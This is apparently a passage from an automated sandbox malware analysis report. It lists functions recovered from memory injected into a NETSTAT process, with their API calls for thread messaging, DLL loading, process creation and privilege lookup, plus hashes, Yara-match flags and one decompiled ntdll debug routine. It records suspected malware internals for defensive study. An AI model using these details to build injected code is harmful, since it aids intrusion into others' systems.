                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: c732dd9e817b90548b354c36b135eb155acfce905f0b1c85a0abd262d6a1ce15
                                  • Instruction ID: 8f6826e4ffdebf95bbc86ff09d08bc84757c9b048e64211cfb5f5da3f5146ce2
                                  • Opcode Fuzzy Hash: c732dd9e817b90548b354c36b135eb155acfce905f0b1c85a0abd262d6a1ce15
                                  • Instruction Fuzzy Hash: D8E01AB6200215AFEB18DF55CC48EE737A9EF88350F114599F9096B252C631E914CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00427280 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 004272DA
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 004272FB
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 17bf1a12fb81164548b30c1481225c3706791b62dfa32afc893a89784d206fbb
                                  • Instruction ID: 0ae16ea99f888f6afae4ccc52589cf3c2b288eebc17869c4ca8749d886d0963e
                                  • Opcode Fuzzy Hash: 17bf1a12fb81164548b30c1481225c3706791b62dfa32afc893a89784d206fbb
                                  • Instruction Fuzzy Hash: 8F01F731A8022977E720AA95AC03FBF772C5B04B55F54005AFF04BA1C1E6D86D0546FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042D428 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 497 42d428-42d42d 498 42d481-42d4c4 call 43a140 call 428a30 call 439690 call 427120 497->498 499 42d42f-42d454 call 433e50 497->499 513 42d4c6-42d4cc 498->513 514 42d4cd-42d4f1 call 43a3b0 498->514 506 42d456-42d45b SetErrorMode 499->506 507 42d45d-42d460 499->507 506->507 517 42d4f2-42d4fa 514->517 518 42d501-42d50a call 4292a0 517->518 519 42d4fc-42d4ff 517->519 520 42d50d-42d523 call 43ac40 518->520 519->518 519->520 525 42d546-42d548 520->525 526 42d525-42d543 call 43a3b0 call 43a0c0 520->526 527 42d5b7-42d5c2 525->527 528 42d54a-42d54d 525->528 526->525 530 42d5c3-42d5cb 528->530 531 42d54f-42d566 call 433a50 528->531 537 42d5a1-42d5a8 531->537 538 42d568-42d593 call 42d2b0 531->538 537->517 540 42d5ae-42d5b6 537->540 538->540 542 42d595-42d59f call 43a0a0 538->542 542->537
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,00427C83,?), ref: 0042D45B
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 455ee226862dee173c177cc884e9ef57ef38f331baa11d47675b7e553651884b
                                  • Instruction ID: 22ef90a8f54669e4837df6a5cc9c0c1e6b0eef8378bba8c8e41dafe6b4cfd57e
                                  • Opcode Fuzzy Hash: 455ee226862dee173c177cc884e9ef57ef38f331baa11d47675b7e553651884b
                                  • Instruction Fuzzy Hash: 4901FC71E402186AEB20EBA5DC43FBA73689F54704F04414EF90CD7282DAB899818655
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00429B40 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00429BB2
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                  • Instruction ID: a33eb77e61b80884313af5a800c5125c06dc9e8e8b662fbea87ead9dfe57cd6e
                                  • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                  • Instruction Fuzzy Hash: 5B0112B5E4010DB7DF10DAA5EC42F9EB778AF54308F004196A90897285F675EB14C795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004389B9 Relevance: 1.5, APIs: 1, Instructions: 44processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 004389B4
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 7b5dcf57f7a6008fa39af2a7df8f6c7d31803cb7662a3ada0597ed34539f86b9
                                  • Instruction ID: b9b1708aa2d13421c64f1ff45c7633cc988f3f95c49da93c44148b735e112c89
                                  • Opcode Fuzzy Hash: 7b5dcf57f7a6008fa39af2a7df8f6c7d31803cb7662a3ada0597ed34539f86b9
                                  • Instruction Fuzzy Hash: 88F014B2200209AFDB18DF99DC80EAB73ADAF8C350F018159FA0897241CA30E811CBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042D461 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,00427C83,?), ref: 0042D45B
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: af2443c40e77449a2e9dc44d66ee9b694cbb0a3007144ed1281922038d67c0b7
                                  • Instruction ID: 5475761542f85b764209bd188170ed8063d6350ff94b8fb017bd1de56d8072ec
                                  • Opcode Fuzzy Hash: af2443c40e77449a2e9dc44d66ee9b694cbb0a3007144ed1281922038d67c0b7
                                  • Instruction Fuzzy Hash: 12F0CD31F4021829EF11AAB1AC86FBB7378DF54714F00455EBD1CD6181EBB859904795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00438960 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 004389B4
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction ID: 85c17eb05c808c676750a17a6fa3f787df92c37e28fedd23e182bc1366c28269
                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction Fuzzy Hash: 3D01AFB2214108ABCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00437430 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0042CCF0,?,?), ref: 0043746C
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 301ba72de499be6b6f63082158b1da9bde1bd3350a698f254bab4a33bdeb0a3a
                                  • Instruction ID: 8dd9a6a642f8b74ae1a01466b93130f73a458c3b4cb8dc6bb3fb03147c61caf3
                                  • Opcode Fuzzy Hash: 301ba72de499be6b6f63082158b1da9bde1bd3350a698f254bab4a33bdeb0a3a
                                  • Instruction Fuzzy Hash: 37E092733803043AE33065A9AC03FE7B39CCB95B25F54002BFA4DEB2C1D599F90142A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00437428 Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0042CCF0,?,?), ref: 0043746C
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 9a12d39bec2bc6f3d8ec32b61687a45e0bf7c5860c897110ba693094b88d0433
                                  • Instruction ID: f8a294e97f0e409defd85b54006c6867fea41c064b0aae017e6eca25d2d33a0e
                                  • Opcode Fuzzy Hash: 9a12d39bec2bc6f3d8ec32b61687a45e0bf7c5860c897110ba693094b88d0433
                                  • Instruction Fuzzy Hash: FDF02B763503403AF33127599C03FA77799DB91B14FA4141EF3999F2C1E998F402826D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00438A43 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0042CFC2,0042CFC2,?,00000000,?,?), ref: 00438A80
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 7aa03c0550600a1820d5d52cf55f8fd4dc2bc623c4404b9f7e86757a5d021da1
                                  • Instruction ID: 468b6a43e62eb64e8181c11c0908457623f8307e3cbd949f2cc3ba04f8f854dd
                                  • Opcode Fuzzy Hash: 7aa03c0550600a1820d5d52cf55f8fd4dc2bc623c4404b9f7e86757a5d021da1
                                  • Instruction Fuzzy Hash: 08E09B716002046BDB10DF54DC84FDB7759AF85264F054255F9586B681C635D911C7F4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00438A50 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0042CFC2,0042CFC2,?,00000000,?,?), ref: 00438A80
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction ID: 68037234c24169b647f8905b4359e0f16b8f3cbeb26fd7196d58db6c16cbdfe4
                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction Fuzzy Hash: A3E01AB16002086BDB10DF49CC85EE737ADAF88650F018155FA0867241C934E910CBF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042D430 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,00427C83,?), ref: 0042D45B
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                  • Instruction ID: 1fa93123a5fed399a572d435050af2e349ddbc6eae5462e40baf85622d894c80
                                  • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                  • Instruction Fuzzy Hash: DFD05E617503042AE610BAA49C03F2632885B55B45F494064FA48963C3D968E5008565
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00438A85 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0042CFC2,0042CFC2,?,00000000,?,?), ref: 00438A80
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 1e001322639cc478076f0aeba9eb7c1c59b9d126d59ec3677524c20280ebe012
                                  • Instruction ID: ca102688c3a2f576428aabf6cfced32a141792104e7994b50df4281ffd2bc7d8
                                  • Opcode Fuzzy Hash: 1e001322639cc478076f0aeba9eb7c1c59b9d126d59ec3677524c20280ebe012
                                  • Instruction Fuzzy Hash: 29C012B12401045B8601EE589C408A67369EFC4214B14841AF81A83151D531D41156A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C9967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7e580f9825b019624801c6ec928b6ca360d56cd845b85b383e04dec2abb5abdf
                                  • Instruction ID: 4f6a3d49c666312cdfd68ca3b921ca7a29af467b69c9abfd0ab629c75a8300a9
                                  • Opcode Fuzzy Hash: 7e580f9825b019624801c6ec928b6ca360d56cd845b85b383e04dec2abb5abdf
                                  • Instruction Fuzzy Hash: C3B09BB19014C6D5DB51D765460C7177A1077D0745F66C055D1030681A4778C191F5B5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 02CEFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E02CEFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02C9CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02CE5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02CE5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                  0x02cefdda
                                  0x02cefde2
                                  0x02cefde5
                                  0x02cefdec
                                  0x02cefdfa
                                  0x02cefdff
                                  0x02cefe0a
                                  0x02cefe0f
                                  0x02cefe17
                                  0x02cefe1e
                                  0x02cefe19
                                  0x02cefe19
                                  0x02cefe19
                                  0x02cefe20
                                  0x02cefe21
                                  0x02cefe22
                                  0x02cefe25
                                  0x02cefe40

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02CEFDFA
                                  Strings
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02CEFE2B
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02CEFE01
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: 317d6b131f3a3581a81527822010f7c487a1fa1b4c507590f302f57a94450fe4
                                  • Instruction ID: c357f64946f2697169d74e9c51462737fc7f79b9c2ccd7112b4105ea18971f3f
                                  • Opcode Fuzzy Hash: 317d6b131f3a3581a81527822010f7c487a1fa1b4c507590f302f57a94450fe4
                                  • Instruction Fuzzy Hash: 73F0F676200641BFFA201A55DC06F23BB6FEB84770F140319F629565D1DE62F93096F1
                                  Uniqueness

                                  Uniqueness Score: -1.00%